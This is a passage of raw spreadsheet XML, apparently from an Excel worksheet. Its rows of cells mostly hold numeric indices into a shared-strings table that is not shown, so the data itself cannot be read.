      <c r="S1935" s="12" t="s">
        <v>13978</v>
      </c>
      <c r="T1935" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1935" s="12" t="s">
        <v>13979</v>
      </c>
      <c r="V1935" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W1935" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1935" s="12">
        <v>9</v>
      </c>
      <c r="Y1935" s="12" t="s">
        <v>13980</v>
      </c>
    </row>
    <row r="1936" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1936" s="12">
        <v>10077</v>
      </c>
      <c r="B1936" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1936" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1936" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1936" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1936" s="12" t="s">
        <v>13981</v>
      </c>
      <c r="H1936" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1936" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1936" s="12" t="s">
        <v>363</v>
      </c>
      <c r="K1936" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1936" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1936" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1936" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1936" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1936" s="12" t="s">
        <v>13982</v>
      </c>
      <c r="Q1936" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1936" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1936" s="12" t="s">
        <v>13698</v>
      </c>
      <c r="T1936" s="12" t="s">
        <v>13687</v>
      </c>
      <c r="U1936" s="12" t="s">
        <v>13983</v>
      </c>
      <c r="V1936" s="12" t="s">
        <v>9670</v>
      </c>
      <c r="W1936" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1936" s="12">
        <v>25</v>
      </c>
      <c r="Y1936" s="12" t="s">
        <v>13984</v>
      </c>
    </row>
    <row r="1937" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1937" s="12">
        <v>10078</v>
      </c>
      <c r="B1937" s="12" t="s">
        <v>30916</v>
      </c>
      <c r="C1937" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D1937" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1937" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1937" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1937" s="12" t="s">
        <v>13985</v>
      </c>
      <c r="H1937" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1937" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1937" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K1937" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1937" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1937" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1937" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1937" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1937" s="12" t="s">
        <v>13986</v>
      </c>
      <c r="Q1937" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1937" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1937" s="12" t="s">
        <v>13987</v>
      </c>
      <c r="T1937" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1937" s="12" t="s">
        <v>13988</v>
      </c>
      <c r="V1937" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W1937" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1937" s="12">
        <v>2</v>
      </c>
      <c r="Y1937" s="12" t="s">
        <v>13989</v>
      </c>
    </row>
    <row r="1938" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1938" s="12">
        <v>10079</v>
      </c>
      <c r="B1938" s="12" t="s">
        <v>30304</v>
      </c>
      <c r="D1938" s="12" t="s">
        <v>30305</v>
      </c>
      <c r="E1938" s="12" t="s">
        <v>31517</v>
      </c>
      <c r="F1938" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1938" s="12" t="s">
        <v>13990</v>
      </c>
      <c r="H1938" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1938" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1938" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K1938" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1938" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1938" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1938" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1938" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1938" s="12" t="s">
        <v>13642</v>
      </c>
      <c r="Q1938" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1938" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1938" s="12" t="s">
        <v>13991</v>
      </c>
      <c r="T1938" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1938" s="12" t="s">
        <v>13992</v>
      </c>
      <c r="V1938" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W1938" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1938" s="12">
        <v>1</v>
      </c>
      <c r="Y1938" s="12" t="s">
        <v>13993</v>
      </c>
    </row>
    <row r="1939" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1939" s="12">
        <v>10080</v>
      </c>
      <c r="B1939" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1939" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1939" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1939" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G1939" s="12" t="s">
        <v>13994</v>
      </c>
      <c r="H1939" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1939" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J1939" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1939" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1939" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1939" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1939" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1939" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1939" s="12" t="s">
        <v>13657</v>
      </c>
      <c r="Q1939" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1939" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1939" s="12" t="s">
        <v>13995</v>
      </c>
      <c r="T1939" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1939" s="12" t="s">
        <v>13996</v>
      </c>
      <c r="V1939" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W1939" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1939" s="12">
        <v>19</v>
      </c>
      <c r="Y1939" s="12" t="s">
        <v>13997</v>
      </c>
    </row>
    <row r="1940" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1940" s="12">
        <v>10083</v>
      </c>
      <c r="B1940" s="12" t="s">
        <v>30682</v>
      </c>
      <c r="D1940" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1940" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1940" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1940" s="12" t="s">
        <v>14008</v>
      </c>
      <c r="H1940" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1940" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1940" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1940" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1940" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1940" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1940" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1940" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1940" s="12" t="s">
        <v>14009</v>
      </c>
      <c r="Q1940" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R1940" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1940" s="12" t="s">
        <v>14010</v>
      </c>
      <c r="T1940" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1940" s="12" t="s">
        <v>14011</v>
      </c>
      <c r="V1940" s="12" t="s">
        <v>11875</v>
      </c>
      <c r="W1940" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1940" s="12">
        <v>4</v>
      </c>
      <c r="Y1940" s="12" t="s">
        <v>14012</v>
      </c>
    </row>
    <row r="1941" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1941" s="12">
        <v>10086</v>
      </c>
      <c r="B1941" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D1941" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1941" s="12" t="s">
        <v>29975</v>
      </c>
      <c r="G1941" s="12" t="s">
        <v>14013</v>
      </c>
      <c r="H1941" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1941" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1941" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K1941" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1941" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1941" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1941" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1941" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1941" s="12" t="s">
        <v>13657</v>
      </c>
      <c r="Q1941" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1941" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1941" s="12" t="s">
        <v>14014</v>
      </c>
      <c r="T1941" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1941" s="12" t="s">
        <v>14015</v>
      </c>
      <c r="V1941" s="12" t="s">
        <v>13290</v>
      </c>
      <c r="W1941" s="12">
        <v>10159</v>
      </c>
      <c r="X1941" s="12">
        <v>16</v>
      </c>
      <c r="Y1941" s="12" t="s">
        <v>14016</v>
      </c>
    </row>
    <row r="1942" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1942" s="12">
        <v>10090</v>
      </c>
      <c r="B1942" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1942" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1942" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1942" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1942" s="12" t="s">
        <v>14021</v>
      </c>
      <c r="H1942" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1942" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1942" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K1942" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1942" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1942" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1942" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1942" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1942" s="12" t="s">
        <v>13657</v>
      </c>
      <c r="Q1942" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1942" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1942" s="12" t="s">
        <v>14022</v>
      </c>
      <c r="T1942" s="12" t="s">
        <v>13118</v>
      </c>
      <c r="U1942" s="12" t="s">
        <v>14023</v>
      </c>
      <c r="V1942" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W1942" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1942" s="12">
        <v>1</v>
      </c>
      <c r="Y1942" s="12" t="s">
        <v>14024</v>
      </c>
    </row>
    <row r="1943" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1943" s="12">
        <v>10092</v>
      </c>
      <c r="B1943" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1943" s="12" t="s">
        <v>30162</v>
      </c>
      <c r="E1943" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1943" s="12" t="s">
        <v>30155</v>
      </c>
      <c r="G1943" s="12" t="s">
        <v>14025</v>
      </c>
      <c r="H1943" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1943" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1943" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K1943" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1943" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1943" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1943" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1943" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1943" s="12" t="s">
        <v>14026</v>
      </c>
      <c r="Q1943" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1943" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1943" s="12" t="s">
        <v>14027</v>
      </c>
      <c r="T1943" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1943" s="12" t="s">
        <v>14028</v>
      </c>
      <c r="V1943" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W1943" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1943" s="12">
        <v>2</v>
      </c>
      <c r="Y1943" s="12" t="s">
        <v>14029</v>
      </c>
    </row>
    <row r="1944" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1944" s="12">
        <v>10100</v>
      </c>
      <c r="B1944" s="12" t="s">
        <v>30205</v>
      </c>
      <c r="D1944" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1944" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1944" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1944" s="12" t="s">
        <v>14041</v>
      </c>
      <c r="H1944" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1944" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1944" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K1944" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1944" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1944" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1944" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1944" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1944" s="12" t="s">
        <v>14035</v>
      </c>
      <c r="Q1944" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1944" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1944" s="12" t="s">
        <v>14042</v>
      </c>
      <c r="T1944" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="U1944" s="12" t="s">
        <v>14043</v>
      </c>
      <c r="V1944" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1944" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1944" s="12">
        <v>14</v>
      </c>
      <c r="Y1944" s="12" t="s">
        <v>14044</v>
      </c>
    </row>
    <row r="1945" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1945" s="12">
        <v>10102</v>
      </c>
      <c r="B1945" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1945" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D1945" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E1945" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F1945" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1945" s="12" t="s">
        <v>14045</v>
      </c>
      <c r="H1945" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1945" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1945" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1945" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1945" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1945" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1945" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1945" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1945" s="12" t="s">
        <v>14046</v>
      </c>
      <c r="Q1945" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1945" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1945" s="12" t="s">
        <v>14047</v>
      </c>
      <c r="T1945" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1945" s="12" t="s">
        <v>14048</v>
      </c>
      <c r="V1945" s="12" t="s">
        <v>9065</v>
      </c>
      <c r="W1945" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1945" s="12">
        <v>7</v>
      </c>
      <c r="Y1945" s="12" t="s">
        <v>14049</v>
      </c>
    </row>
    <row r="1946" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1946" s="12">
        <v>10103</v>
      </c>
      <c r="B1946" s="12" t="s">
        <v>30842</v>
      </c>
      <c r="D1946" s="12" t="s">
        <v>30841</v>
      </c>
      <c r="E1946" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1946" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1946" s="12" t="s">
        <v>14050</v>
      </c>
      <c r="H1946" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1946" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1946" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K1946" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1946" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1946" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1946" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1946" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1946" s="12" t="s">
        <v>14035</v>
      </c>
      <c r="Q1946" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1946" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1946" s="12" t="s">
        <v>14051</v>
      </c>
      <c r="T1946" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1946" s="12" t="s">
        <v>14052</v>
      </c>
      <c r="V1946" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W1946" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1946" s="12">
        <v>2</v>
      </c>
      <c r="Y1946" s="12" t="s">
        <v>14053</v>
      </c>
    </row>
    <row r="1947" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1947" s="12">
        <v>10105</v>
      </c>
      <c r="B1947" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1947" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1947" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1947" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1947" s="12" t="s">
        <v>14059</v>
      </c>
      <c r="H1947" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1947" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1947" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K1947" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1947" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1947" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1947" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1947" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1947" s="12" t="s">
        <v>14060</v>
      </c>
      <c r="Q1947" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R1947" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1947" s="12" t="s">
        <v>14061</v>
      </c>
      <c r="T1947" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1947" s="12" t="s">
        <v>14062</v>
      </c>
      <c r="V1947" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W1947" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1947" s="12">
        <v>1</v>
      </c>
      <c r="Y1947" s="12" t="s">
        <v>14063</v>
      </c>
    </row>
    <row r="1948" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1948" s="12">
        <v>10106</v>
      </c>
      <c r="B1948" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1948" s="12" t="s">
        <v>30913</v>
      </c>
      <c r="E1948" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1948" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1948" s="12" t="s">
        <v>14064</v>
      </c>
      <c r="H1948" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1948" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1948" s="12" t="s">
        <v>2023</v>
      </c>
      <c r="K1948" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1948" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1948" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1948" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1948" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1948" s="12" t="s">
        <v>14065</v>
      </c>
      <c r="Q1948" s="12" t="s">
        <v>28336</v>
      </c>
      <c r="R1948" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1948" s="12" t="s">
        <v>14066</v>
      </c>
      <c r="T1948" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1948" s="12" t="s">
        <v>14067</v>
      </c>
      <c r="V1948" s="12" t="s">
        <v>2027</v>
      </c>
      <c r="W1948" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1948" s="12">
        <v>1</v>
      </c>
      <c r="Y1948" s="12" t="s">
        <v>14068</v>
      </c>
    </row>
    <row r="1949" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1949" s="12">
        <v>10107</v>
      </c>
      <c r="B1949" s="12" t="s">
        <v>29976</v>
      </c>
      <c r="D1949" s="12" t="s">
        <v>29977</v>
      </c>
      <c r="E1949" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1949" s="12" t="s">
        <v>29950</v>
      </c>
      <c r="G1949" s="12" t="s">
        <v>14069</v>
      </c>
      <c r="H1949" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1949" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1949" s="12" t="s">
        <v>283</v>
      </c>
      <c r="K1949" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1949" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1949" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1949" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1949" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1949" s="12" t="s">
        <v>14035</v>
      </c>
      <c r="Q1949" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1949" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1949" s="12" t="s">
        <v>14070</v>
      </c>
      <c r="T1949" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1949" s="12" t="s">
        <v>14071</v>
      </c>
      <c r="V1949" s="12" t="s">
        <v>3605</v>
      </c>
      <c r="W1949" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1949" s="12">
        <v>3</v>
      </c>
      <c r="Y1949" s="12" t="s">
        <v>14072</v>
      </c>
    </row>
    <row r="1950" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1950" s="12">
        <v>10108</v>
      </c>
      <c r="B1950" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C1950" s="12" t="s">
        <v>30251</v>
      </c>
      <c r="D1950" s="12" t="s">
        <v>30252</v>
      </c>
      <c r="E1950" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1950" s="12" t="s">
        <v>30246</v>
      </c>
      <c r="G1950" s="12" t="s">
        <v>14073</v>
      </c>
      <c r="H1950" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1950" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1950" s="12" t="s">
        <v>2238</v>
      </c>
      <c r="K1950" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1950" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1950" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1950" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1950" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1950" s="12" t="s">
        <v>12892</v>
      </c>
      <c r="Q1950" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1950" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1950" s="12" t="s">
        <v>14074</v>
      </c>
      <c r="T1950" s="12" t="s">
        <v>14075</v>
      </c>
      <c r="U1950" s="12" t="s">
        <v>14076</v>
      </c>
      <c r="V1950" s="12" t="s">
        <v>2242</v>
      </c>
      <c r="W1950" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1950" s="12">
        <v>9</v>
      </c>
      <c r="Y1950" s="12" t="s">
        <v>14077</v>
      </c>
    </row>
    <row r="1951" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1951" s="12">
        <v>10109</v>
      </c>
      <c r="B1951" s="12" t="s">
        <v>29948</v>
      </c>
      <c r="C1951" s="12" t="s">
        <v>29978</v>
      </c>
      <c r="D1951" s="12" t="s">
        <v>29975</v>
      </c>
      <c r="E1951" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1951" s="12" t="s">
        <v>29979</v>
      </c>
      <c r="G1951" s="12" t="s">
        <v>14078</v>
      </c>
      <c r="H1951" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1951" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1951" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1951" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1951" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1951" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1951" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1951" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1951" s="12" t="s">
        <v>14079</v>
      </c>
      <c r="Q1951" s="12" t="s">
        <v>28321</v>
      </c>
      <c r="R1951" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1951" s="12" t="s">
        <v>14080</v>
      </c>
      <c r="T1951" s="12" t="s">
        <v>14081</v>
      </c>
      <c r="U1951" s="12" t="s">
        <v>14082</v>
      </c>
      <c r="V1951" s="12" t="s">
        <v>4483</v>
      </c>
      <c r="W1951" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1951" s="12">
        <v>9</v>
      </c>
      <c r="Y1951" s="12" t="s">
        <v>14083</v>
      </c>
    </row>
    <row r="1952" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1952" s="12">
        <v>10117</v>
      </c>
      <c r="B1952" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D1952" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1952" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1952" s="12" t="s">
        <v>14091</v>
      </c>
      <c r="H1952" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1952" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1952" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K1952" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1952" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1952" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1952" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1952" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1952" s="12" t="s">
        <v>14031</v>
      </c>
      <c r="Q1952" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1952" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1952" s="12" t="s">
        <v>14092</v>
      </c>
      <c r="T1952" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1952" s="12" t="s">
        <v>14093</v>
      </c>
      <c r="V1952" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W1952" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1952" s="12">
        <v>49</v>
      </c>
      <c r="Y1952" s="12" t="s">
        <v>14094</v>
      </c>
    </row>
    <row r="1953" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1953" s="12">
        <v>10123</v>
      </c>
      <c r="B1953" s="12" t="s">
        <v>31207</v>
      </c>
      <c r="D1953" s="12" t="s">
        <v>31189</v>
      </c>
      <c r="E1953" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1953" s="12" t="s">
        <v>31194</v>
      </c>
      <c r="G1953" s="12" t="s">
        <v>14105</v>
      </c>
      <c r="H1953" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1953" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1953" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K1953" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1953" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M1953" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1953" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1953" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1953" s="12" t="s">
        <v>14035</v>
      </c>
      <c r="Q1953" s="12" t="s">
        <v>28308</v>
      </c>
      <c r="R1953" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1953" s="12" t="s">
        <v>14106</v>
      </c>
